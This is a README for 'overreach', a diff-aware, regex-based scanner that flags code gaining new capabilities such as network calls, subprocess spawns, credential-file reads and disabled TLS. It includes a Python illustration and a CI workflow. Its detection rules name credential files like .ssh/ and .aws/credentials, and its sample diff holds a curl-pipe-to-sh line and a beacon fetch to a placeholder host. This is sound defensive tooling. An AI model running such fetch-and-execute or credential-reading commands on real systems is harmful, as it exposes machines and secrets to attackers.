Catch code that overreaches before it merges. A single fast binary that scans a diff, file, or whole repo for code reaching beyond what it should — outbound network calls, subprocess spawns, sensitive-file reads, curl | sh, disabled TLS, and hardcoded secrets — and prints graded findings. No runtime, no daemon, no config. Think ripgrep, but for what this code is allowed to touch.
Built for the age of AI coding agents: when an agent ships a PR, the dangerous change is rarely the feature — it's the quiet fetch to an unknown host or the execSync that wasn't there yesterday. overreach catches that line.
```console
$ git diff | overreach --diff
CRITICAL src/util.js:15 [pipe_to_shell]
         Downloads a script and pipes it straight into a shell
CRITICAL src/util.js:16 [hardcoded_secret]
         Possible hardcoded Anthropic credential (value redacted)
HIGH     src/util.js:13 [network_call]
         Makes an outbound network call
5 finding(s): 2 critical, 3 high, 0 medium, 0 low
FAIL (findings at/above high)
```
Code review optimizes for "is the feature correct?" — not "did this diff quietly gain a new capability?" As autonomous agents get write access to real repositories, the second question is the one that bites. overreach is a fast, zero-config first pass that answers it, locally, before anything merges.
- Diff-aware. Scans only the added lines of a unified diff, so you see what a change introduces, not what was already there.
- Secrets are reported, never echoed. A hardcoded key is flagged by provider ("Anthropic", "AWS") with the literal value redacted; overreach never prints a credential back at you.
- CI-ready. `--json` output and a configurable `--fail-on` severity make it a one-line PR gate.
- Dependency-light. Two crates (`regex`, `serde`). No network access, no telemetry, nothing phones home.
```sh
cargo install --path . --locked
# or, once published:
# cargo install overreach --locked
```

Produces a single static-ish binary. Drop it anywhere on PATH.
```sh
overreach [PATH]                  # scan a file or directory (default: .)
git diff | overreach --diff       # scan only the added lines of a diff
overreach --diff --json           # machine-readable output for CI
overreach . --fail-on critical    # only fail the build on critical findings
```

| Flag | Effect |
|---|---|
| `--diff` | Read a unified diff from stdin; scan added lines only |
| `--json` | Emit findings + summary as JSON |
| `--fail-on <level>` | Exit non-zero at/above one of `low`, `medium`, `high`, `critical` (default `high`) |
| `-h`, `--help` | Help |
| `-V`, `--version` | Version |
Exit code is 0 when nothing is at/above --fail-on, 1 otherwise — so it slots straight into a pipeline.
| Kind | Severity | What it flags |
|---|---|---|
| `pipe_to_shell` | critical | `curl`/`wget … \| sh`: downloading and executing a script in one breath |
| `hardcoded_secret` | critical | Provider-prefixed credentials (Anthropic, OpenAI, GitHub, AWS, Slack, Google, GitLab, Stripe). Value redacted. |
| `sensitive_fs_read` | critical | References to `.ssh/`, `id_rsa`, `/etc/passwd`, `.aws/credentials`, `.env`, `.npmrc` |
| `network_call` | high | `fetch`, `axios`, `requests.*`, `urllib`, raw sockets, WebSockets |
| `subprocess_spawn` | high | `child_process`, `exec`/`execSync`, `spawn`, `subprocess.*`, `os.system`, `process::Command` |
| `tls_verification_disabled` | medium | `rejectUnauthorized: false`, `verify=False`, `InsecureSkipVerify: true`, `NODE_TLS_REJECT_UNAUTHORIZED` |
| `file_too_large_to_scan` | low | Files exceeding the 8 MiB per-file cap are skipped and reported: a coverage gap, not a content finding |
This is a fast, regex-based first pass — it favors catching things over zero false positives. It is not a full taint analysis; treat findings as "look here," not "proven exploit."
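To make the diff-aware scanning, severity grading, secret redaction and `--fail-on` gating concrete, here is an added Python illustration of the same approach. It is not overreach's code (overreach is Rust and its rule set is larger); the regex patterns, the provider-prefix table and the sample diff are constructed for this example, and the "key" in the sample is a placeholder, not a real credential.

```python
"""Toy, diff-aware capability scanner in the spirit of overreach (illustration only)."""
import re
import sys
from dataclasses import dataclass

SEVERITY_RANK = {"low": 0, "medium": 1, "high": 2, "critical": 3}

# Well-known credential prefixes -> provider name (assumed, illustrative subset).
# Only the provider is reported; the matched value is never printed.
SECRET_PREFIXES = {"sk-ant-": "Anthropic", "AKIA": "AWS", "ghp_": "GitHub"}

# (kind, severity, pattern, message). Patterns are illustrative, not overreach's own.
RULES = [
    ("pipe_to_shell", "critical",
     re.compile(r"\b(curl|wget)\b[^|\n]*\|\s*(sudo\s+)?(ba|z)?sh\b"),
     "Downloads a script and pipes it straight into a shell"),
    ("hardcoded_secret", "critical",
     re.compile(r"(?P<prefix>sk-ant-|AKIA|ghp_)[A-Za-z0-9_\-]{16,}"),
     "Possible hardcoded {provider} credential (value redacted)"),
    ("sensitive_fs_read", "critical",
     re.compile(r"\.ssh/|id_rsa|/etc/passwd|\.aws/credentials|(?<!\w)\.env\b|\.npmrc"),
     "Touches a sensitive file or credential store"),
    ("network_call", "high",
     re.compile(r"\b(fetch|axios|requests\.\w+|urllib)\b"),
     "Makes an outbound network call"),
    ("subprocess_spawn", "high",
     re.compile(r"\b(child_process|execSync|spawn|subprocess\.\w+|os\.system)\b"),
     "Spawns a subprocess"),
    ("tls_verification_disabled", "medium",
     re.compile(r"rejectUnauthorized:\s*false|verify\s*=\s*False|"
                r"InsecureSkipVerify:\s*true|NODE_TLS_REJECT_UNAUTHORIZED"),
     "Disables TLS certificate verification"),
]


@dataclass
class Finding:
    severity: str
    path: str
    line: int
    kind: str
    message: str


def added_lines(diff_text):
    """Yield (path, new_line_no, text) for every '+' line of a unified diff."""
    path, lineno = "?", 0
    for raw in diff_text.splitlines():
        if raw.startswith("+++ "):
            path = raw[4:].split("\t")[0]
            path = path[2:] if path.startswith("b/") else path
        elif raw.startswith("@@"):
            # Hunk header: the new-file start line is the number after '+'.
            lineno = int(re.match(r"@@ -\d+(?:,\d+)? \+(\d+)", raw).group(1))
        elif raw.startswith("+"):
            yield path, lineno, raw[1:]
            lineno += 1
        elif raw.startswith(" "):
            lineno += 1  # context line: exists in the new file but is not new
        # '-' lines and '\ No newline at end of file' do not advance the counter


def scan_diff(diff_text):
    """Run every rule over the added lines only; one finding per rule per line."""
    findings = []
    for path, lineno, text in added_lines(diff_text):
        for kind, severity, pattern, message in RULES:
            m = pattern.search(text)
            if not m:
                continue
            if kind == "hardcoded_secret":
                # Name the provider from the prefix; discard the matched value.
                message = message.format(provider=SECRET_PREFIXES[m.group("prefix")])
            findings.append(Finding(severity, path, lineno, kind, message))
    return findings


def summarize(findings, fail_on="high"):
    """Per-severity counts plus whether anything sits at/above the fail_on level."""
    counts = {s: 0 for s in SEVERITY_RANK}
    for f in findings:
        counts[f.severity] += 1
    threshold = SEVERITY_RANK[fail_on]
    failed = any(SEVERITY_RANK[f.severity] >= threshold for f in findings)
    return counts, failed


def render(findings, fail_on="high"):
    """Return (report text, exit code): 1 when the gate fails, 0 otherwise."""
    out = []
    for f in sorted(findings, key=lambda f: (-SEVERITY_RANK[f.severity], f.path, f.line)):
        out.append(f"{f.severity.upper():<8} {f.path}:{f.line} [{f.kind}]")
        out.append(f"         {f.message}")
    counts, failed = summarize(findings, fail_on)
    out.append(f"{len(findings)} finding(s): "
               + ", ".join(f"{counts[s]} {s}" for s in ("critical", "high", "medium", "low")))
    out.append(f"{'FAIL' if failed else 'PASS'} (findings at/above {fail_on})")
    return "\n".join(out), 1 if failed else 0


# Constructed sample diff. The NODE_TLS line is pre-existing context, so it is not
# reported in diff mode; the "key" is a placeholder, not a real credential.
SAMPLE_DIFF = """\
diff --git a/src/util.js b/src/util.js
--- a/src/util.js
+++ b/src/util.js
@@ -10,5 +10,7 @@ function helper() {
   const fs = require("fs");
   return fs.readFileSync("./data.json");
+  fetch("https://example.invalid/beacon");
+  require("child_process").execSync("curl -s https://example.invalid/x.sh | sh");
+  const key = "sk-ant-PLACEHOLDERPLACEHOLDER00";
   process.env.NODE_TLS_REJECT_UNAUTHORIZED = "0";
-  const old = "gone";
 }
"""

if __name__ == "__main__":
    # Usage: git diff | python scan.py [fail_on]; with no piped input, scans SAMPLE_DIFF.
    text = sys.stdin.read() if not sys.stdin.isatty() else SAMPLE_DIFF
    report, code = render(scan_diff(text), sys.argv[1] if len(sys.argv) > 1 else "high")
    print(report)
    sys.exit(code)
```

The two design points worth copying are in `added_lines` and `scan_diff`: the new-file line counter advances on `+` and context lines but not on `-` lines, which is what makes reported line numbers land on the post-merge file, and the secret rule formats its message from the prefix captured by the regex while the rest of the match is dropped before anything is stored or printed.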
```yaml
# .github/workflows/overreach.yml
name: overreach
on: pull_request

# Minimum-privilege token: this job only needs to read source.
permissions:
  contents: read

jobs:
  overreach:
    runs-on: ubuntu-latest
    steps:
      # Pin third-party actions to commit SHAs (with the tag as a comment)
      # so a compromised upstream tag can't silently change what runs in CI.
      - uses: actions/checkout@34e114876b0b11c390a56381ad16ebd13914f8d5 # v4
        with:
          fetch-depth: 0
          # Don't leave GITHUB_TOKEN in .git/config — `cargo build` runs
          # build scripts from every transitive dep.
          persist-credentials: false
      - uses: dtolnay/rust-toolchain@29eef336d9b2848a0b548edc03f92a220660cdb8 # stable
      # --locked enforces the committed Cargo.lock.
      - run: cargo build --release --locked
      - name: Scan the PR diff
        # An explicit `shell: bash` runs with `-o pipefail`, so a failing
        # `git diff` fails the step instead of feeding overreach an empty diff
        # (the implicit default shell is `bash -e` without pipefail).
        shell: bash
        env:
          # Route the trigger value through env so it can't be interpolated
          # into the shell script body.
          BASE_REF: ${{ github.base_ref }}
        run: git diff "origin/$BASE_REF...HEAD" | ./target/release/overreach --diff --fail-on high
```

A composite action is provided in action.yml for reuse.
overreach is the standalone, language-agnostic cousin of CapabilityEcho from the agent-gov suite — the same idea (catch capability drift in a diff), repackaged as one fast binary with no Node and no suite to adopt. Use overreach for a quick gate anywhere; reach for the full agent-gov suite when you want cross-tool consolidation and a single PR verdict.
MIT © Connor Hickey